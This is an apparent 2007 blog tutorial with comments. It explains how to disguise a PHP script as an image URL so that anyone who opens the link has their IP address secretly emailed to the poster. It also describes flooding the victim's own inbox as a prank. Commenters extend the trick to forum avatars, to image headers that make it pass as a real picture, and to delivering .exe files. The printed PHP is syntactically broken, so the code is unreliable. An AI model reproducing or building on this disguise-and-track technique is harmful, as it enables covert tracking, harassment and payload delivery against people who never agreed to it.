Hide PHP/HTML/JavaScript and more in images!

posted on January 7th, 2007

While trying to the IP from someone in my MSN list I found out the following (if you aren’t interested in getting someone’s IP, don’t stop reading, this’ll be the best prank ever):


1. Get a webhost that supports PHP and make a new folder called /nameofyourimage.jpg/ Yes, it’ll work, you can make folders containing dots.

2. In this folder, create a file called index.php (using notepad > save as or using your favorite web editor).

3. Open the file in you editor and copy-paste the following code:

$remote_addr = getenv(’REMOTE_ADDR’);
$toaddress = “your@mail.com” // enter your e-mail address here!
$subject = “IP tracket” // This will be subject of the e-mail
$message = ” IP: $remote_addr ” // The message in the mail
$fromname = “profit42.com” // The name of the sender
$fromaddress = “bot@me.com” // The sender’s e-mail
$headers = “MIME-Version: 1.0\n”
$headers .= “Content-type: text/plain; charset=iso-8859-1\n”
$headers .= “X-Priority: 3\n”
$headers .= “X-MSMail-Priority: Normal\n”
$headers .= “X-Mailer: php\n”
$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”
mail($toaddress, $subject, $message, $headers);
<img src=”nameofyourimage.jpg”>

4. Save and upload the file. Also upload nameofyourimage.jpg to the folder. If you visit the page, you’ll see something like this: http://www.profit42.com/test.jpg, notice the / apppearing after .jpg in the adddress bar. This is telling you that it’s a folder….

5. Then give someone in your MSN list the link (webhost.com/nameofyourimage.jpg). If he clicks it his/her IP will be mailed to you! Imagine the possibilities…

6. If you can’t imagine any possibility, read on: Tell him or her the IP and say that it’s been mailed to you. Also ask if he/she can stop refreshing the page, every refresh is sending a mail to you.

7. 99% of the people will ignore this warning and will put a stone on their refresh button, so quickly after step 6, change the variable $toaddress to the e-mail of your victim. After ten minutes, tell your victim to check his or her mailbox…

That’s about everything. With this simple trick you can hide everything in an image. Replace the PHP code with something else, add JavaScript and/or HTML: use your imagination!


  1. Jonas M. Rogne said on January 8th, 2007 at 1:19 am :

    Oh, that’s a neat trick. And I’m sure this can be used for more stuff as well ;)

  2. William Hook said on January 8th, 2007 at 3:33 pm :

    Awesome, thanks a lot. ;)
    I’ll be using this, muhahahahahah! *evil grin*

  3. Satılık Ev said on February 9th, 2007 at 5:02 am :

    This can be very interesting if used on forums that lets you submit avatar link.. or sites such as myspace..

  4. mickey said on February 14th, 2007 at 10:04 am :

    it very interesting.thnx

  5. Veracious said on February 19th, 2007 at 6:39 pm :

    just use modrewrite for it.

    so u got some http://www.domain.com/superimg.jpg url(but in fact its some getip.php script)

    works quite nice if posted in a forum, as u know img-tags will always load.

  6. Fate said on March 21st, 2007 at 11:05 pm :

    Parse error: syntax error, unexpected T_VARIABLE in /mysitename/not/gunna/release/it/ index.php on line 4

    what the hell lol? i’ve re written it like 6 times but nothing

  7. ColdDayInHell said on March 31st, 2007 at 12:21 am :

    i keep gettin this error ..i’m using firefox 2

    Parse error: parse error in /data/members/free/tripod/uk/c/o/l/*******/htdocs/test.jpg/index.php on line 3

  8. Golin said on April 9th, 2007 at 1:47 am :

    try add a semicolons at the end of each line ( before the comments // )

  9. ColdDayInHell said on April 9th, 2007 at 8:52 pm :

    yea i did add semi columns

  10. ColdDayInHell said on April 11th, 2007 at 3:32 am :

    good idea u rule
    finally got it to work …

  11. ColdDayInHell said on April 11th, 2007 at 3:38 am :

    U know after i look at it
    the code actually returns a fake ip not the real ip
    we’r searching for because u used getenv’remot_addr’
    u should’ve used _server[’REMOTE_ADDR’]
    this do return the real ip

    U Know wut i mean >>//peace

  12. Romeosa! said on June 24th, 2007 at 9:54 pm :

    Oh fun.

    I like it :)

    I should have fun with this. :)

  13. Stavy said on June 29th, 2007 at 8:41 pm :

    Wouldn’t it be better if the php returned an image like:
    header(”Content-type: image/jpeg”);
    //maybe setting expire headers etc.
    //image code etc.

    instead of an image in an image tag? this way it can be used in image tags itself as and the prank can be extended to forums, and other places that won’t like loading html.

  14. XANA said on July 10th, 2007 at 8:05 pm :

    Stavy, I’ve tried that and it doesn’t seem to work.

  15. THRZ said on August 9th, 2007 at 11:15 am :

    Stavy, Xana, you’re nearly there - return a “header(”Content-type: image/jpeg”);”, but you’ll need to put an image in there in the first place:


  16. Snooper said on January 12th, 2008 at 7:57 pm :

    I have a little question,

    if I read it well, (can be a problem because I am from the Netherlands) it is possible to place any type of file in this image-map. but can someone explain me how I place for example an *.exe .. and I would also like if it shows me if someone clicked on the link.

    it would be great if someone could help me out.



Leave a Reply